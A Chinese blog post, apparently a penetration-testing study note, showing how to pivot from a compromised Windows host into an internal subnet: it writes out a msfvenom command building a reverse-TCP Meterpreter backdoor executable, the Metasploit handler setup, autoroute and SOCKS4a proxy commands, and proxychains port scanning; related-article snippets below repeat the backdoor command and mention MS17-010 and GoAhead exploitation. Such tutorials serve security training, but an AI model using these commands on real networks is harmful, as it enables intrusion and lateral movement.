内网渗透思路03之跨路由扫描

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量945 收藏 5
点赞数 1
分类专栏: 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43970718/article/details/114478726
版权

在这里插入图片描述

生成metasploit后门

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.196  lport=12345 -f exe >/var/www/html/s.exe

kali监听

use exploit/multi/handler

set payload  windows/meterpreter/reverse_tcp

set lhost 192.168.0.196

set lport 12345

exploit

手动上传木马文件到目标机器,并执行。

msf绘画中常用命令

查看当前用户					getuid


进入cmd交互shell界面			Shell

Systeminfo					//在cmd交互shell下执行,显示目标系统信息。

获取网卡信息					ifconfig

路由信息

run get_local_subnets		//可以用此命令查看目标机器所在内网网端信息与公网网端信息。

在这里插入图片描述

增加路由

run autoroute -s 10.10.10.0/24

//添加一条通向目标服务器内网的路由,即让目标路由分配给当前kali一个内网IP。

//此时,msf就可以直接访问目标内网中其他机器。

run autoroute –p

//查看有没有新增成功,下图这种出现结果即表明新增成功。

在这里插入图片描述

Background

//返回,把meterpreter后台挂起

开启socks 4代理

use auxiliary/server/socks4a

// 让Metasploit可以作为一个SOCKS代理服务器

Set srvport 10044		//设置服务端口

在这里插入图片描述

修改本机kali的网络配置文件

/etc/prxoychains.conf

在这里插入图片描述

扫描/访问内网其他机器

新开一个窗口扫描端口服务,扫描内网中其他机器端口开放情况。

在这里插入图片描述

扫描到80端口开放;另外这个速度有一点慢。

采用tcp扫描,禁止ping操作。

也可以扫描一些其他常用端口:
在这里插入图片描述

如果全是timeout那么就应该思考一下,是不是配置出错。

如msf里端口,或者/etc/prxoychains.conf文件内容不对。

也可以用proxychains代理火狐访问一些其他内网机器
在这里插入图片描述

划水的小白白
关注
专栏目录
内网渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
lza20001103的博客
09-04 2194
Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限 文章目录Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记 前言 相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2441
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器
冰河的专栏
01-14 2584
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550 攻击机:Kali 192.168.75.10 跳板: Metasploitable2 192.168.75.130 目标机: Windows Server 2012 192.168.75.140 这里无法通过Kali(192.168.75.10)主机直接访问...
20210215web渗透学习之路由扫描
qq_45290991的博客
05-15 301
生成metasploit后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=12345 -f exe >/var/www/html/s.exe 1 kali监听 use exploit/multi/handler set ...
内网路由扫描
qq_45300786的博客
05-19 577
思路 我们已经拿到了08这台机器的权限了,然后我们想移动到10段这台机器,这个时候,我们就可以通过添加路由的方法来访问到10这台机器。 获取网段 配置代理
如何路由器远程某个子网内的电脑_干货!思科路由器知识集锦~
weixin_39801202的博客
11-24 269
思科路由器的迷人之处,是对那些对路由不熟悉的人来说,它可以通过路由协议、手动配置和各种其它方法,选择最佳路由。在Cisco路由器里建立和维护路由表涉及三个进程:1、各种路由进程,实际上运行一个网络(或路由)协议,如增强的内部网关路由协议(EIGRP)、边界网关协议(BGP)、中间系统到中间系统(IS-IS)和开放式最短路径优先(OSPF)。2、路由表本身接收路由进程的信息,并且回复转发进...
Windows网络服务渗透测试实战-网段攻击
c_lanxiaofang的博客
05-19 6466
一、实验项目名称 Windows网络服务渗透测试实战-网段攻击 二、实验目的及要求 掌握对网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
web渗透之学习笔记
shy的博客
10-15 865
一、sqlmap -p 指定注入点 –technique 指定注入类型 B:Boolean-based blind(布尔型注入) E:Error-based(报错型注入) U:Union query-based(可联合查询注入) S:Stacked queries(可多语句查询注入) T:Time-based blind(基于时间延迟注入) Q:Inline queries(嵌套查询注入) oracle 默认的端bai口号是1521 ...
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2781
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
内网渗透之多种方式实现内网穿透(详细)
qq_38348692的博客
09-03 1万+
靶机为win7 使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到 创建跳板路由: run autoroute -s 192.168.10.0/24 创建路由 run autoroute -p 打印路由[在这里插入图片描述] 输入background退回metaploit可以看...
内网渗透基础总结
wulanlin的博客
01-06 2318
研究内网安全我们首先需要弄明白内网是什么?在渗透测试过程中我们一般把因特网称为外网,而将其余的网络(政务网、公安网、企业内网等)定义为内网。后来我仔细思考了一下,内外网的概念其实是相对而言的,比如一台电脑同处于办公室内的小型局域网和公司的大型局域网内,那么就可以把办公室内的局域网称为内网,公司的大型局域网称为外网。而通常情况下我们会同处于公司网和因特网之内,那么就会常常把因特网称为外网,公司网称为内网,久而久之这种概念也就形成了。内网相对于外网来说通信更快、传输文件更方便、共享更便利,但是相对来说安全性也更
【内网安全】——meterpreter使用攻略
最新发布
qq_53058639的博客
01-26 1322
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
MSF内网渗透实战
hackzkaq的博客
05-17 3953
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
使用Metasploit搭建跳板——未更完
渗透测试
06-05 1064
文章目录前言一、添加路由项方法一:①功能介绍②具体过程方法二:①介绍功能②具体过程二、进行攻击总结 前言 本文简单介绍了使用metasploit搭建跳板进行攻击 一、添加路由项 添加路由项功能: 关于路由表,本人对metasploit使用添加路由项并没有深刻理解,仅供参考; 方法一: 使用run autoroute -p/-s ①功能介绍 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Examp
metasploit小白教程总结
sweetie 的博客
01-03 2464
msf小白学习教程一 1.msf是什么? msf全称:metasplpit 作用:Metasploit是一个渗透测试平台 环境:kali-linux 自动搭建了msf环境 2.msf的详细分解 在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。 2.1搜索模块 首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。 2.1.1 搜索模块命令:search 命令介绍:msfconsole
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
msf命令
qq_52469895的博客
05-19 2292
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
kali扫描内网ip_Metasploit路由转发实现内网渗透
weixin_42349645的博客
12-10 933
利用背景在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,扩大战果。现在假设的场景是此时我们已经拿下一台内网服务器的远程桌面环境,在进行内网渗透时,发现内网有大量存MS17-010的漏洞主机,如果我们想拿下这些主机,可能就要使用NSA工具箱,但是此工具箱的使用相当的麻烦,这里提供一个思路,我们可以...
linux嵌入式远程代码执行漏洞,GoAhead远程代码执行漏洞(CVE-2017-17562)分析及实战...
weixin_39683858的博客
05-06 411
前言GoAhead Web Server 广泛应用于嵌入式设备中,最近其出现了一个高危漏洞,在开启CGI的情况下,可以远程代码执行,据此本文简要分析了该漏洞详情,并在某款路由器上成功复现,反弹shell。漏洞分析这个漏洞出现在goahead/src/cgi.c:cgihandler函数中,它使用http请求参数中的键值对来初始化新进程的envp参数,在此处只对“REMOTE_HOST”和“HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值